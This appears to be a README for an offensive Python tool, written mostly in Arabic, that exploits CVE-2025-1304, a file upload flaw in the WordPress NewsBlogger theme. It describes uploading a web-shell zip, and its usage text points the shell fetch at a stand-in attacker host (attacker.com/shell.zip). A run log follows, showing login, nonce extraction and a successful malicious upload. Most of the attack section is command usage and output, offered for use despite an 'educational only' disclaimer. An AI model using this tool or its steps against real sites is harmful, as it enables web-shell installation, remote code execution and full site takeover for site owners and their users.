
إصدارات قالب WordPress NewsBlogger <= 0.2.5.1 عرضة لثغرة تحميل ملفات عشوائية.
درجة CVSS: 8.8 (عالية)
نوع الثغرة: رفع ملف تعسفي
المكون: قالب ووردبريس
معرف CVE: CVE-2025-1304
قالب NewsBlogger لووردبريس (الإصدارات <= 0.2.5.1) معرض لـ رفع ملف تعسفي عبر لوحة الترحيب الخاصة بالمشرف.
تسمح هذه الثغرة لأي مستخدم مصادق — بما في ذلك أولئك الذين لديهم دور المشترك الأدنى — برفع أرشيف .zip ضار يحتوي على قشرة ويب.
يتم الرفع عبر حقل عنوان URL للمكون الإضافي غير المُتحقق منه، والذي يفشل في التحقق بشكل صحيح من محتوى أو نوع الملف المرفوع.
يمكن أن يؤدي الهجوم الناجح إلى اختراق كامل للموقع، بما في ذلك تنفيذ الأوامر عن بُعد وتصعيد الامتيازات.
يقوم هذا البرنامج النصي بلغة Python بأتمتة استغلال الثغرة من خلال:
nonce ديناميكيًا من صفحة الترحيب الضعيفة.python CVE-2025-1304.py -h
usage: a.py [-h] --url URL --username USERNAME --password PASSWORD --shellweb SHELLWEB
WordPress NewsBlogger Theme vulnerable to Arbitrary File Upload #By: Nxploited ( Khaled Alenazi )
options:
-h, --help show this help message and exit
--url, -u URL Target base URL (e.g., http://target/wordpress)
--username, -un USERNAME WordPress admin username
--password, -p PASSWORD WordPress admin password
--shellweb, -shell SHELLWEB
Direct URL to the malicious shell zip (e.g., http://attacker.com/shell.zip)
[+] Logging in to http://target/wordpress/wp-login.php
[+] Logged in successfully.
[+] Fetching welcome page to extract nonce: http://target/wordpress/wp-admin/admin.php?page=newsblogger-welcome
[+] Extracted nonce: 012818100b
[+] Sending malicious plugin URL to: http://target/wordpress/wp-admin/admin-ajax.php
[+] Server response:
{"success":true,"data":{"redirect_url":"http://target/wordpress/wp-admin/admin.php?page=newsblogger-welcome"}}
هذا الكود مقدم لأغراض التعليم واختبار الأمان المصرح به فقط.
لا يتحمل المؤلف أي مسؤولية عن أي إساءة استخدام أو ضرر ناتج عن هذه الأداة.
بقلم: Nxploited (Khaled Alenazi)